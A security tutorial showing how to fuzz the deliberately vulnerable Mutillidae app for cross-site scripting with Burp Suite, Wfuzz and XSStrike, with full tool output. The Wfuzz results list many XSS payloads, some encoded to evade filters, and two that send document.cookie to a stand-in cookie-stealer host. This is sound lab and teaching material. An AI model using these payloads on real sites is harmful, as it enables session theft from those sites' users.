Cross-site scripting is one of the most common vulnerabilities found on the web today, with repercussions of this type of flaw ranging from harmless defacement to sensitive data exposure. Probing for XSS can be tedious and time-consuming for an attacker, but luckily there are tools available to make things a little easier, including Burp Suite, Wfuzz, and XSStrike.
Fuzzing Overview
Fuzzing is a technique used to test applications for security flaws in an automated fashion. The fuzzer, a piece of software designed to test for these flaws, provides malformed or random data as input to a program in order to find bugs, usually leading to vulnerabilities in the context of security. Generated input can be static, such as values loaded from a list, or random, and new fuzzers are even starting to use algorithms to dynamically generate and input data.
We will be using Mutillidae, a vulnerable web application, to test for XSS flaws. To get started, open up Mutillidae, and on the left, browse to "OWASP Top 10," then "Cross Site Scripting," followed by "Reflected," and finally "DNS Lookup." This will be our entry point for XSS fuzzing.
App 1: Burp Suite
Burp Suite is a powerful tool used to test web applications for vulnerabilities. The free Community Edition is included in Kali Linux. In its most common utilization, Burp is used as a proxy to intercept and modify requests.
We need to configure our browser to work with Burp. In Firefox, go to "Preferences," and scroll all the way down to the section titled Network Proxy. Click on the "Settings" button, select "Manual proxy configuration," and enter 127.0.0.1 as the HTTP Proxy and 8080 as the Port. Now, check "Use this proxy server for all protocols," and make sure it is blank under No Proxy for.
Finally, click "OK," and everything should be configured correctly. You can then fire up Burp Suite and start a new project. Navigate to the "Proxy" tab and ensure the "Intercept is on" button is pressed. This will allow us to modify the request and fuzz for XSS.
Next, back in Mutillidae, enter a value in the Hostname/IP text box, and hit "Lookup DNS" to submit the request (I just used 127.0.0.1 – it doesn't really matter here). The request should show up in Burp now.
Right-click anywhere in the request window, and select "Send to Intruder," then navigate to the "Intruder" tab. We will use the "Sniper" attack type to iterate through a list of payloads. Burp will automatically select positions to use, which are the parameters to test, but for now, we only need one. Hit the "Clear" button on the right, highlight the target host we entered earlier, and hit the "Add" button.
Next, go to the "Payloads" tab, and under Payload Options, press "Load." There is a useful wordlist located at /usr/share/wfuzz/wordlist/Injections/XSS.txt — browse to it and we are ready to launch the attack.
Press "Start attack," and a new window will pop up. Once the attack has iterated through all the payloads in our wordlist, the attack is finished and we can see all the requests and their status codes.
To demonstrate, let's take a look at request number 3. If we paste this payload into the DNS Lookup utility, an alert box will pop up proving that this page is indeed vulnerable to XSS.
Before we move on to other tools, make sure your browser's proxy configuration is changed back to use system settings.
App 2: Wfuzz
Wfuzz is another popular tool used to fuzz applications not only for XSS vulnerabilities, but also SQL injections, hidden directories, form parameters, and more. It is included in Kali by default.
To display help settings, type wfuzz -h at the terminal.
wfuzz -h
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
* *
* Version up to 1.4c coded by: *
* Christian Martorella (cmartorella@edge-security.com) *
* Carlos del ojo (deepbit@gmail.com) *
* *
* Version 1.4d to 2.2.11 coded by: *
* Xavier Mendez (xmendez@edge-security.com) *
********************************************************
Usage: wfuzz [options] -z payload,params <url>
FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of the specified payload.
FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
Options:
-h : This help
--help : Advanced help
--version : Wfuzz version details
-e <type> : List of available encoders/payloads/iterators/printers/scripts
-c : Output with colors
-v : Verbose information.
--interact : (beta) If selected,all key presses are captured. This allows you to interact with the program.
-p addr : Use Proxy in format ip:port:type. Repeat option for using various proxies.
Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
...
We will be testing the same page in Mutillidae for XSS vulnerabilities. Basic usage of Wfuzz includes specifying a wordlist file including the payloads to use with the -z flag, and the URL to test, replacing the parameter in question with FUZZ. We can also set the -c flag to get color output.
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt http://172.16.1.102/mutillidae/index.php?page=FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000020: C=200 514 L 1425 W 21898 Ch "<IMG%20SRC=`javascript:alert("'WXSS'")`>"
000019: C=200 514 L 1425 W 21812 Ch "<IMG%20SRC=javascript:alert("WXSS")>"
000021: C=200 514 L 1425 W 21983 Ch "<IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">"
000001: C=200 514 L 1420 W 21769 Ch ""><script>""
000003: C=200 514 L 1420 W 21907 Ch "<<script>alert("WXSS");//<</script>"
000016: C=200 514 L 1425 W 21877 Ch "<IMG%20SRC="javascript:alert('WXSS')""
000015: C=200 514 L 1425 W 21893 Ch "<IMG%20SRC="javascript:alert('WXSS');">"
000002: C=200 514 L 1420 W 21870 Ch "<script>alert("WXSS")</script>"
000018: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=JaVaScRiPt:alert('WXSS')>"
000017: C=200 514 L 1425 W 21858 Ch "<IMG%20SRC=javascript:alert('WXSS')>"
000022: C=200 514 L 1425 W 21973 Ch "<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>"
000023: C=200 514 L 1425 W 21762 Ch "<IMG%20SRC='javasc ript:alert(document.cookie)'>"
000024: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav ascript:alert('WXSS');">"
000025: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav	ascript:alert('WXSS');">"
000027: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav
ascript:alert('WXSS');">"
000030: C=200 514 L 1425 W 21903 Ch "<IMG%20LOWSRC="javascript:alert('WXSS')">"
000029: C=200 514 L 1425 W 21903 Ch "<IMG%20DYNSRC="javascript:alert('WXSS')">"
000026: C=200 514 L 1425 W 21757 Ch "<IMG%20SRC="jav
ascript:alert('WXSS');">"
000028: C=200 514 L 1430 W 21747 Ch "<IMG%20SRC="%20%20javascript:alert('WXSS');">"
000031: C=200 514 L 1425 W 22060 Ch "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
000032: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000033: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000034: C=200 514 L 1425 W 21727 Ch "<IMG%20SRC=javascript:alert('XSS')>"
000036: C=200 514 L 1425 W 22191 Ch ""><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>"
000037: C=200 514 L 1425 W 22196 Ch "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
000035: C=200 514 L 1425 W 21950 Ch "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
000039: C=200 514 L 1420 W 21763 Ch "'';!--"<XSS>=&{()}"
000038: C=200 514 L 1420 W 22883 Ch "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}"
000005: C=200 514 L 1420 W 21911 Ch "'><script>alert(document.cookie)</script>"
000004: C=200 514 L 1420 W 21895 Ch "<script>alert(document.cookie)</script>"
000006: C=200 514 L 1420 W 21916 Ch "'><script>alert(document.cookie);</script>"
000007: C=200 514 L 1420 W 21776 Ch "\";alert('XSS');//"
000008: C=200 514 L 1420 W 21875 Ch "%3cscript%3ealert("WXSS");%3c/script%3e"
000009: C=200 514 L 1420 W 21900 Ch "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
000010: C=200 514 L 1425 W 21875 Ch "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
000011: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);</script>"
000012: C=200 563 L 1570 W 24175 Ch "<script>alert(document.cookie);<script>alert"
000013: C=200 514 L 1420 W 21964 Ch "<xss><script>alert('WXSS')</script></vulnerable>"
000014: C=200 514 L 1425 W 21913 Ch "<IMG%20SRC='javascript:alert(document.cookie)'>"
Total time: 26.54032
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.469462
We can see each request ID, the response code, and information about that request. The payloads from our wordlist file are also included, and near the bottom, there is data including total time and the number of requests. Also of use, when fuzzing an application where many different response codes might be encountered, the --hc flag can be utilized to ignore certain responses, such as 404 codes.
Another helpful feature of Wfuzz is the ability to encode payloads in order to bypass defensive filters more effectively. To list the available encoders, use the following command.
wfuzz -e encoders
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
Available encoders:
Category | Name | Summary
------------------------------------------------------------------------------------------------------------------------
url_safe, url | urlencode | Replace special characters in string using the %xx escape. Letters, digits, and
| | the characters '_.-' are never quoted.
url_safe, url | double urlencode | Applies a double encode to special characters in string using the %25xx escape.
| | Letters, digits, and the characters '_.-' are never quoted.
url | uri_double_hex | Encodes ALL charachers using the %25xx escape.
html | html_escape | Convert the characters '&', '<' and '>' in string to HTML-safe sequences.
html | html_hexadecimal | Replaces ALL characters in string using the &#xx; escape
hashes | base64 | Encodes the given string using base64
url | doble_nibble_hex | Replaces ALL characters in string using the %%dd%dd escape
db | mssql_char | Converts ALL characters to MsSQL's char(xx)
url | utf8 | Replaces ALL characters in string using the \u00xx escape
hashes | md5 | Applies a md5 hash to the given string
default | random_upper | Replaces random characters in string with its capitals letters
url | first_nibble_hex | Replaces ALL characters in string using the %%dd? escape
default | hexlify | Every byte of data is converted into the corresponding 2-digit hex representatio
| | n.
url | second_nibble_hex | Replaces ALL characters in string using the %?%dd escape
url | uri_hex | Encodes ALL charachers using the %xx escape.
default | none | Returns string without changes
hashes | sha1 | Applies a sha1 hash to the given string
url | utf8_binary | Replaces ALL characters in string using the \uxx escape
url | uri_triple_hex | Encodes ALL charachers using the %25%xx%xx escape.
url | uri_unicode | Replaces ALL characters in string using the %u00xx escape
html | html_decimal | Replaces ALL characters in string using the &#dd; escape
db | oracle_char | Converts ALL characters to Oracle's chr(xx)
db | mysql_char | Converts ALL characters to MySQL's char(xx)
Simply append the desired encoder (in this case urlencode) to the specified file, separated by a comma, to encode the payloads.
wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt,urlencode http://172.16.1.102/mutillidae/index.php?page=FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************
Target: http://172.16.1.102/mutillidae/index.php?page=FUZZ
Total requests: 39
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000003: C=200 514 L 1420 W 21907 Ch "%3C%3Cscript%3Ealert%28%22WXSS%22%29%3B//%3C%3C/script%3E"
000002: C=200 514 L 1420 W 21870 Ch "%3Cscript%3Ealert%28%22WXSS%22%29%3C/script%3E"
000001: C=200 514 L 1420 W 21769 Ch "%22%3E%3Cscript%3E%22"
000007: C=200 514 L 1420 W 21776 Ch "%5C%22%3Balert%28%27XSS%27%29%3B//"
000005: C=200 514 L 1420 W 21911 Ch "%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000009: C=200 514 L 1420 W 21926 Ch "%253cscript%253ealert%28document.cookie%29%3B%253c%252fscript%253e"
000008: C=200 514 L 1420 W 21891 Ch "%253cscript%253ealert%28%22WXSS%22%29%3B%253c/script%253e"
000004: C=200 514 L 1420 W 21895 Ch "%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
000010: C=200 514 L 1420 W 21901 Ch "%253Cscript%253Ealert%28%2522X%2520SS%2522%29%3B%253C/script%253E"
000006: C=200 514 L 1420 W 21916 Ch "%27%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E"
000011: C=200 514 L 1420 W 21924 Ch "%26ltscript%26gtalert%28document.cookie%29%3B%3C/script%3E"
000015: C=200 514 L 1420 W 21903 Ch "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000012: C=200 514 L 1420 W 21968 Ch "%26ltscript%26gtalert%28document.cookie%29%3B%26ltscript%26gtalert"
000014: C=200 514 L 1420 W 21923 Ch "%3CIMG%2520SRC%3D%27javascript%3Aalert%28document.cookie%29%27%3E"
000019: C=200 514 L 1420 W 21934 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28%26quot%3BWXSS%26quot%3B%29%3E"
000013: C=200 514 L 1420 W 21964 Ch "%3Cxss%3E%3Cscript%3Ealert%28%27WXSS%27%29%3C/script%3E%3C/vulnerable%3E"
000016: C=200 514 L 1420 W 21887 Ch "%3CIMG%2520SRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22"
000017: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28%27WXSS%27%29%3E"
000018: C=200 514 L 1420 W 21868 Ch "%3CIMG%2520SRC%3DJaVaScRiPt%3Aalert%28%27WXSS%27%29%3E"
000020: C=200 514 L 1420 W 21908 Ch "%3CIMG%2520SRC%3D%60javascript%3Aalert%28%22%27WXSS%27%22%29%60%3E"
000022: C=200 514 L 1420 W 21983 Ch "%3CIMG%2520SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E"
000021: C=200 514 L 1420 W 21993 Ch "%3CIMG%2520%22%22%22%3E%3CSCRIPT%3Ealert%28%22WXSS%22%29%3C/SCRIPT%3E%22%3E"
000023: C=200 514 L 1425 W 21928 Ch "%3CIMG%2520SRC%3D%27javasc%09ript%3Aalert%28document.cookie%29%27%3E"
000025: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000024: C=200 514 L 1425 W 21908 Ch "%3CIMG%2520SRC%3D%22jav%09ascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000028: C=200 514 L 1420 W 21966 Ch "%3CIMG%2520SRC%3D%22%2520%26%2314%3B%2520javascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000027: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000030: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520LOWSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000026: C=200 514 L 1420 W 21941 Ch "%3CIMG%2520SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27WXSS%27%29%3B%22%3E"
000029: C=200 514 L 1420 W 21913 Ch "%3CIMG%2520DYNSRC%3D%22javascript%3Aalert%28%27WXSS%27%29%22%3E"
000031: C=200 514 L 1420 W 22118 Ch "%3CIMG%2520SRC%3D%27%2526%2523x6a%3Bavasc%2526%2523000010ript%3Aa%2526%2523x6c%3Bert%28document.%2526%2523x63%3Bookie%29%27%3E"
000032: C=200 514 L 1420 W 22562 Ch "%3CIMG%2520SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E"
000033: C=200 514 L 1420 W 22967 Ch "%3CIMG%2520SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E"
000035: C=200 514 L 1420 W 21996 Ch "%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C/IFRAME%253E"
000034: C=200 514 L 1420 W 22507 Ch "%3CIMG%2520SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E"
000036: C=200 514 L 1420 W 22191 Ch "%22%3E%3Cscript%3Edocument.location%3D%27http%3A//cookieStealer/cgi-bin/cookie.cgi%3F%27%2Bdocument.cookie%3C/script%3E"
000037: C=200 514 L 1420 W 22396 Ch "%2522%253E%253Cscript%253Edocument%252Elocation%253D%2527http%253A%252F%252Fyour%252Esite%252Ecom%252Fcgi%252Dbin%252Fcookie%252Ecgi%253F%2527%2520%252Bdocument%252Ecookie%253C%252Fscript%253E"
000038: C=200 514 L 1420 W 22906 Ch "%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29//%3E%3C/SCRIPT%3E%21--%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C/SCRIPT%3E%3D%26%7B%7D"
000039: C=200 514 L 1420 W 21796 Ch "%27%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D"
Total time: 27.33954
Processed Requests: 39
Filtered Requests: 0
Requests/sec.: 1.426505
The results are similar to before, but now the each payload is URL encoded.
App 3: XSStrike
The last tool we will look at today is XSStrike. It is a dedicated suite for detecting cross-site scripting vulnerabilities that includes an intelligent payload generator, a fuzzer, a crawler, WAF detection, and more. XSStrike is currently in beta.
Before we can use this tool, we need to download it from GitHub and install it on our machine. The process may vary slightly depending on the system, but for reference, I am using the latest version of Kali. XSStrike works best with Python 3.
Download the tool using the wget utility in the terminal, as seen in the below command.
wget https://github.com/s0md3v/XSStrike/archive/master.zip
Next, extract the archive by typing unzip master.zip and changing into the extracted directory with cd XSStrike-master. Now we should be able to run the tool by typing python3 xsstrike.py at the prompt.
It may throw an error stating that the fuzzywuzzy module is not installed.
python3 xsstrike.py
Traceback (most recent call last):
File "xsstrike.py", line 35, in <module>
from core.checker import checker
File "/root/XSStrike-master/core/checker.py", line 3, in <module>
from fuzzywuzzy import fuzz
ModuleNotFoundError: No module named 'fuzzywuzzy'
If this is the case, just use pip3 install fuzzywuzzy to install the missing module. Now we should be good to go.
To display the help menu, use the -h flag.
python3 xsstrike.py -h
XSStrike v3.0-beta
usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [--fuzzer] [--update]
[--timeout] [--params] [--crawl] [-l LEVEL] [--headers]
[-t THREADS] [-d DELAY] [--skip-poc] [--skip-dom]
optional arguments:
-h, --help show this help message and exit
-u TARGET, --url TARGET
url
--data DATA post data
--fuzzer fuzzer
--update update
--timeout timeout
--params find params
--crawl crawl
-l LEVEL, --level LEVEL
level of crawling
--headers add headers
-t THREADS, --threads THREADS
number of threads
-d DELAY, --delay DELAY
delay between requests
--skip-poc skip poc generation
--skip-dom skip dom checking
XSStrike's basic usage is quite simple — use the -u flag followed by the URL to test.
python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php
XSStrike v3.0-beta
[~] Checking for DOM vulnerabilities
------------------------------------------------------------
52 //document.getElementById("idSystemInformationHeading").innerHTML = l_loginMessage;
53 document.getElementById("idHintsStatusHeading").innerHTML = 'Hints: ' + l_hintsStatus;
54 document.getElementById("idSecurityLevelHeading").innerHTML = 'Security Level: ' + l_securityLevel + ' (' + l_securityLevelDescription + ')';
446 Google Hacking Database
495 <a onclick="document.location.href='';"
584 window.localStorage.setItem("LocalStorageTarget","This is set by the index.php page");
585 window.sessionStorage.setItem("SessionStorageTarget","This is set by the index.php page");
------------------------------------------------------------
[+] Potentially vulnerable objects found
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><A%0aoNMOUseoveR%0d=%0d(confirm)() x>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]
This tool begins by checking for DOM-based XSS vulnerabilities, and the potentially vulnerable parameters are displayed on the screen. Reflected XSS is tested for next, and the interactive payload generator displays the payload and the projected likelihood of success. To continue scanning, hit y at the prompt.
------------------------------------------------------------
[+] Payload: "><d3v%0aONPoINtERENtER+=+(confirm)()>z
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]
We can also skip the DOM-based checking with the --skip-dom option.
python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php --skip-dom
XSStrike v3.0-beta
[+] WAF Status: Offline
[!] Testing parameter: page
[!] Reflections found: 4
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 9256
------------------------------------------------------------
[+] Payload: "><HtmL%09oNPoINterENtEr%0d=%0dconfirm() x//
[!] Efficiency: 100
[!] Cofidence: 10
[?] Would you like to continue scanning? [y/N]
XSStrike also contains fuzzing capabilities used to test filters and WAFs. This can be extremely slow, though, because it uses random delay requests to probe the application. To speed things up, we can set the delay to one second with the -d flag alongside the --fuzzer option.
python3 xsstrike.py -u http://172.16.1.102/mutillidae/index.php?page=dns-lookup.php --skip-dom --fuzzer -d 1
XSStrike v3.0-beta
[+] WAF Status: Offline
[!] Fuzzing parameter: page
[passed] <test
[passed] <test//
[passed] <test>
[passed] <test x>
[passed] <test x=y
[passed] <test x=y//
[passed] <test/oNxX=yYy//
[passed] <test oNxX=yYy>
[passed] <test onload=x
[passed] <test/o%00nload=x
[passed] <test sRc=xxx
[passed] <test data=asa
[passed] <test data=javascript:asa
[passed] <svg x=y>
[passed] <details x=y//
[passed] <a href=x//
[passed] <emBed x=y>
[passed] <object x=y//
[passed] <bGsOund sRc=x>
[passed] <iSinDEx x=y//
[passed] <aUdio x=y>
[passed] <script x=y>
[passed] <script//src=//
...
There are many other features included in this tool, and there are sure to be even more as XSStrike undergoes further development.
Wrap Up
Fuzzing is an extremely useful technique for discovering vulnerabilities in a timely and thorough manner. Today, we explored three fuzzing tools in an effort to find XSS flaws in a vulnerable web application: Burp Suite, Wfuzz, and XSStrike. Knowing how to use tools like these will improve your effectiveness as a white hat hacker and lead you on the path to success.
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
1 Comment
wow this is amazing man., hat down for you <3
Share Your Thoughts